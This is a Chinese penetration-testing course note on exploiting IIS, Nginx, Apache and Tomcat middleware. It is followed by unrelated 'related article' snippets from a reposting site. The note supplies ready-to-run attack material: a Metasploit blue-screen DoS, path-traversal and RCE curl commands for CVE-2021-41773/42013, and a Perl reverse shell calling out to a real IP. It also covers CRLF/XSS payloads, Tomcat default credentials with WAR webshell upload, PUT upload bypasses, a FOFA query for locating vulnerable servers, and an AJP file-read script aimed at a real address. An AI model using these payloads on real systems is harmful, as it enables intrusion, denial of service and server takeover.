Day79:服务攻防-中间件安全IISApacheTomcatNginx弱口令不安全配置CVE

目录

中间件-IIS-短文件&文件解析&蓝屏&写权限

HTTP.SYS(CVE-2015-1635)主要用作蓝屏破坏,跟权限不挂钩

IIS短文件(iis全版本都可能有这个问题)

IIS文件解析

IIS写权限

中间件-Nginx-文件解析&目录穿越漏洞&CRLF

CVE-2013-4547 文件上传

解析漏洞(配置不当)

目录穿越(配置不当)

CRLF注入(配置不当)

中间件-Apache-RCE&目录遍历&文件解析

cve_2021_42013 RCE

cve_2021_41773 目录穿越

Fofaviewer&Apache_RCE-测测实际(cve_2021_41773与cve_2021_42013是同一个问题)

cve-2017-15715 文件解析(条件比较苛刻)

未知扩展名解析漏洞-不识别即向前解析(很少能遇见了)

Apache HTTPD 多后缀解析漏洞(配置问题,比较少见)

中间件-中间件-Tomcat-弱口令&文件上传&文件包含

后台弱口令猜解

CVE-2017-12615 文件上传

cve_2020_1938 文件包含


知识点:

1、中间件-IIS-短文件&解析&蓝屏等

2、中间件-Nginx-文件解析&命令执行等

3、中间件-Apache-RCE&目录遍历&文件解析等

4、中间件-Tomcat-弱口令&文件上传&文件包含等

中间件-IIS-短文件&文件解析&蓝屏&写权限

HTTP.SYS(CVE-2015-1635)主要用作蓝屏破坏,跟权限不挂钩

漏洞描述:远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

影响版本:Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2

漏洞利用条件:安装了IIS6.0以上的Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2版本

漏洞复现-蓝屏

msfconsole
use auxiliary/dos/http/ms15_034_ulonglongadd
set rhosts xx.xx.xx.xx
set rport xx
run

参考地址:https://blog.csdn.net/weixin_45200712/article/details/119944920(curl这个命令powershell自带)

IIS短文件(iis全版本都可能有这个问题)

此漏洞实际是由HTTP请求中旧DOS 8.3名称约定(SFN)的代字符(~)波浪号引起的。它允许远程攻击者在Web根目录下公开文件和文件夹名称(不应该可被访问)。攻击者可以找到通常无法从外部直接访问的重要文件,并获取有关应用程序基础结构的信息。

漏洞成因:为了兼容16位MS-DOS程序,Windows为文件名较长的文件(和文件夹)生成了对应的windows 8.3短文件名。在Windows下查看对应的短文件名,可以使用命令dir /x

应用场景:后台路径获取,数据库文件获取,其他敏感文件获取等

利用工具(可以指定目录扫描,不仅仅只是网站根目录):
https://github.com/lijiejie/IIS_shortname_Scanner(py版本)只能探针前6位

IIS文件解析

应用场景:配合文件上传获取Webshell

IIS 6 解析漏洞
1、该版本默认会将*.asp;.jpg 此种格式的文件名,当成Asp解析
2、该版本默认会将*.asp/目录下的所有文件当成Asp解析。
如:logo.asp;.jpg xx.asp/logo.jpg

IIS 7.x 解析漏洞
在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为php文件

IIS写权限

IIS<=6.0 目录权限开启写入,开启WebDAV,设置为允许

getshell参考:https://cloud.tencent.com/developer/article/2050105

中间件-Nginx-文件解析&目录穿越漏洞&CRLF

CVE-2013-4547 文件上传

影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7

https://vulhub.org/#/environments/nginx/CVE-2013-4547/

条件:(1) 符合的漏洞版本 ,(2) 文件上传点

解析漏洞(配置不当)

目录穿越(配置不当)

Payload: http://your-ip:8081/files../ ,成功穿越到根目录:

CRLF注入(配置不当)

%0a是换行 %0d是回车

检测:手工检测方式 %0aSet-cookie:JSPSESSID%3Ddrops

如果要触发XSS,那么XSS代码就要写在下面的html中,而不是响应头部上,所以%0d%0a%0d%0a<img src=1 onerror=alert(/xss/)>/

工具检测,CRLFuzz:https://github.com/dwisiswant0/crlfuzz/releases

支持单个目标和批量目标

没有漏洞payload测试

有漏洞payload测试

中间件-Apache-RCE&目录遍历&文件解析

Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点,发现 Apache HTTP Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则这可能允许远程代码执行。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50,而不影响更早版本

cve_2021_42013 RCE

curl --data "echo;id" 'http://xx.xx.xx.xx/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

使用bp也行

反弹shell

POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh 
echo;perl -e 'use Socket;$i="47.94.236.117";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

这里就有问题了,这个perl反弹命令不会写怎么办?

只要目标支持这个环境,就可以用这些环境生成的反弹shell命令去试(例如目标有python环境,那是不是就能用python的反弹shell命令去测试)

cve_2021_41773 目录穿越

Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。

curl -v --path-as-is 'http://xx.xx.xx.xx/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'

burp
GET /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd

Fofaviewer&Apache_RCE-测测实际(cve_2021_41773与cve_2021_42013是同一个问题)

fofa:server="Apache/2.4.49"

cve-2017-15715 文件解析(条件比较苛刻)

Apache HTTPD是一款HTTP服务器。其2.4.0~2.4.29版本存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
https://vulhub.org/#/environments/httpd/CVE-2017-15715/

条件:

  1. 符合漏洞版本2.4.0~2.4.29
  2. 有文件上传点
  3. 能够重命名上传文件
  4. 缺一不可

未知扩展名解析漏洞-不识别即向前解析(很少能遇见了)

低版本2.4.23以下版本都可以

Apache HTTPD 多后缀解析漏洞(配置问题,比较少见)

https://vulhub.org/#/environments/httpd/apache_parsing_vulnerability/

如果运维人员给 .php 后缀增加了处理器

配置:AddHandler application/x-httpd-php .php

中间件-中间件-Tomcat-弱口令&文件上传&文件包含

后台弱口令猜解

配置不当导致后台弱口令(admin/admin、tomcat/tomcat),可通过上传jsp压缩包改名的war拿shell

Tomcat存在后台管理,账号密码设置在conf/tomcat-users.xml

弱口令爆破

网上有公开的tomcat爆破工具或者利用BURP直接爆破也行

参考链接:https://blog.csdn.net/weixin_50464560/article/details/119273112

后台getshell,进到后台就能上传war包拿shell了

访问出现404不用管,直接访问该目录下的脚本文件即可

如何制造war包?

1.创建一个JSP脚本文件

2.利用压缩工具压缩成zip后缀

3.把zip后缀改成war即可

CVE-2017-12615 文件上传

当存在漏洞的Tomcat运行在Windows/Linux主机上, 且启用了HTTP PUT请求方法( 例如, 将readonly初始化参数由默认值设置为false) , 攻击者

PUT /x.jsp/ 
PUT /xx.jsp%20
PUT /xxx.jsp::$DATA

将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的JSP的webshell文件,JSP文件中的恶意代码将能被服务器执行, 导致服务器上的数据泄露或获取服务器权限。

影响版本:Apache Tomcat 7.0.0 - 7.0.79

PUT /x.jsp/ 
PUT /xx.jsp%20
PUT /xxx.jsp::$DATA

cve_2020_1938 文件包含

Apache Tomcat AJP协议(默认8009端口)由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp目录下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步结合文件包含实现远程代码的执行。

漏洞影响的产品版本包括:

Tomcat 6.*
Tomcat 7.* < 7.0.100
Tomcat 8.* < 8.5.51
Tomcat 9.* < 9.0.31

https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

D:\Python2.7\python.exe .\CNVD-2020-10487-Tomcat-Ajp-lfi.py 47.98.193.176 -p 35839 -f WEB-INF/web.xml

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/799505.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Leetcode 142. 环形链表 II和Leetcode 242. 有效的字母异位词

文章目录 Leetcode 142. 环形链表 II题目描述C语言题解解题思路 Leetcode 242. 有效的字母异位词题目描述C语言题解和思路解题思路 Leetcode 142. 环形链表 II 题目描述 给定一个链表的头节点 head &#xff0c;返回链表开始入环的第一个节点。 如果链表无环&#xff0c;则返…

MySQL【查询】

与查询直接相关的语句 基本查询语句&#xff1a;包括SELECT、INSERT、UPDATE和DELETE等SQL语句&#xff0c;用于执行常见的数据操作。 **WHERE子句&#xff1a;**用于指定条件&#xff0c;限制SELECT语句返回的行。 SELECT语句示例&#xff1a; -- 检索所有列的数据 SELECT…

rust 异步zip解压缩

在使用actix-web框架的时候&#xff0c;如果使用zip解压任务将会占用一个工作线程&#xff0c;因为zip库是同步阻塞的&#xff0c;想用异步非阻塞需要用另一个库&#xff0c;下面列出同步解压&#xff0c;跟异步解压的两个方法实现&#xff0c;异步解压不会占用工作线程。 阻塞…

Git 配置BCompare工具

一、Git配置BCompare工具 1、安装BCompare工具 下载BCompare安装包&#xff0c;打开安装包直接安装即可&#xff0c;如下&#xff1a; 2、禁止BCompare访问网络 网络进出站进行配置&#xff0c;限制BCompare访问网络&#xff0c;如果不进行上网限制&#xff0c;可能存在被封的…

接口新增方法

JDK8开始接口新增的方法 JDK7以前&#xff1a;接口只能定义抽象方法 JDK8的新特性&#xff1a;接口中可以定义有方法体的方法。&#xff08;默认、静态&#xff09; JDK9的新特性&#xff1a;接口中可以定义私有方法 JDK8以后接口中新增的方法&#xff1a; 允许在接口中定义默认…

【24届数字IC秋招总结】实习面试经验——华为芯片与器件设计工程师实习生

文章目录 前言一、笔试和性格测试二、面试2.1 技术面2.2 hr面前言 实习:笔试 + 1轮技术面 + 1轮主管面 一、笔试和性格测试 笔试题链接 1、网上可以找到很多以往的题目,需要注意的是数字芯片岗位会考到很多验证、中后端的知识,主打一个全栈,不要只看设计或者只看验证的东…

tx-lcn使用

tx-lcn是啥 tx-lcn是一个分布式事务框架&#xff0c;有两个模块组成管理端&#xff08;server&#xff09;和client端。 管理端用于分布式事务的注册&#xff0c;事务消息接收&#xff0c;事务消息下发等管理工作。 client端包括事务发起方&#xff0c;事务参与方。 LCN名称是…

11.手写JavaScript apply方法

一、核心思想 apply方法和call方法相似&#xff0c;区别在于参数&#xff0c;我们可以使用apply方法的原理实现apply方法 二、代码实现 /*** 手写apply* param {Function} o 函数* param {Array} args 数组* return 根据具体情况考虑*/ function Fn(a,b,c,d){console.log(&q…

Spring Security——08,自定义失败处理

自定义失败处理 一、自定义实现类1.1 实现AccessDeniedHandler1.2 实现AuthenticationEntryPoint 二、配置SpringSecurity三、测试3.1 认证失败3.2 权限不足 一键三连有没有捏~~ 我们还希望在认证失败或者是授权失败的情况下也能和我们的接口一样返回相同结构的json&#xff0c…

定义默认参数要牢记一点:默认参数必须指向不变对象!

定义默认参数要牢记一点&#xff1a;默认参数必须指向不变对象&#xff01; 默认参数很有用&#xff0c;但使用不当&#xff0c;也会掉坑里。默认参数有个最大的坑&#xff0c;演示如下&#xff1a; 先定义一个函数&#xff0c;传入一个list&#xff0c;添加一个END再返回&am…

工业视觉检测

目录 我对工业视觉检测的了解 一、关键组成部分 二、应用场景 三、技术挑战 我对工业视觉检测的了解 工业视觉检测是利用机器视觉技术对产品质量进行自动化检查的过程&#xff0c;它在制造业中扮演着至关重要的角色&#xff0c;用于确保产品质量、提高生产效率、减少人工成…

比特币4种地址格式

原生隔离见证、嵌套隔离见证、Taproot和Legacy都是比特币网络中不同的比特币地址格式或交易类型。每一种都有自己的特点和好处: 1.本地隔离见证(Segregated Witness Bech32): 钱包的支持 Phantom, Leather, Unisat, Okex Wallet 本地隔离见证地址以 bc1开始&#xff0c;也称为…

动态规划(2)

动态规划&#xff08;2&#xff09; 文章目录 动态规划&#xff08;2&#xff09;1、聪明的寻宝人2、基因检测3、药剂稀释4、找相似串 1、聪明的寻宝人 #include <iostream> using namespace std; void MaxValue(int values[], int weights[], int n, int m) {int dp[21…

Linux从入门到精通 --- 4(上).快捷键、软件安装、systemctl、软链接、日期和时区、IP地址

文章目录 第四章(上)&#xff1a;4.1 快捷键4.1.1 ctrl c 强制停止4.1.2 ctrl d 退出4.1.3 history4.1.4 历史命令搜索4.1.5 光速移动快捷键4.1.6 清屏 4.2 软件安装4.2.1 yum4.2.2 apt 4.3 systemctl4.4 软链接4.4.1 ln 4.5 日期和时区4.5.1 date命令4.5.2 date进行日期加减…

题目 2011: 电导流的矩形

题目描述: 地图上有若干个导电矩形&#xff0c;长度大小不一&#xff08;矩形四个角的坐标x&#xff0c;y<10000&#xff09;而且电工觉得&#xff0c;反正矩形很标准&#xff0c;边都平行于坐标轴&#xff0c;所以矩形随便给两个对角的点就够了……这电工觉得你够聪明。 …

STC89C51学习笔记(五)

STC89C51学习笔记&#xff08;五&#xff09; 综述&#xff1a;文本讲述了代码中速写模板的创建、如何将矩阵键盘的按键与数字一一对应以及如何创建一个矩阵键盘密码锁。 一、速写模板 点击“templates”&#xff0c;再鼠标右键选择配置&#xff0c;按照以下方式即可修改一些…

倒反天罡的ssh后门 | Linux 后门系列

0x00 简介 今天看见有安全研究员发了一篇 ssh 后门的文章&#xff0c;复现思考后分享给大家 https://blog.thc.org/infecting-ssh-public-keys-with-backdoors 0x01 ssh密钥登录 参考 https://www.commandlinux.com/man-page/man5/authorized_keys.5.html 运维人员管理 Linux …

【Linux ARM 裸机】开发环境搭建

1、Ubuntu 和 Windows 文件互传 使用过程中&#xff0c;要频繁进行 Ubuntu 和 Windows 的文件互传&#xff0c;需要使用 FTP 服务&#xff1b; 1.1、开启 Ubuntu 下的 FTP 服务 //安装 FTP 服务 sudo apt-get install vsftpd //修改配置文件 sudo vi /etc/vsftpd.conf//重启…

若依中editor禁用

this.$refs.editor.Quill.enable(false) 引用&#xff1a;https://blog.csdn.net/qq_33475629/article/details/124615384 图片还是可以用

rsync 远程同步----------安全高效的异地备份策略

目录 一、rsync介绍 rsync和cp的区别 rsync和scp的区别 二、rsync同步方式 rsync备份的方式 三、配置rsync源服务器 ①本地复制 ②下行同步 ③上行同步 四、常用Rsync命令 五、配置源的两种表达方法 六、部署rsync下行同步 ①环境准备 ②配置rsync源服务器-------…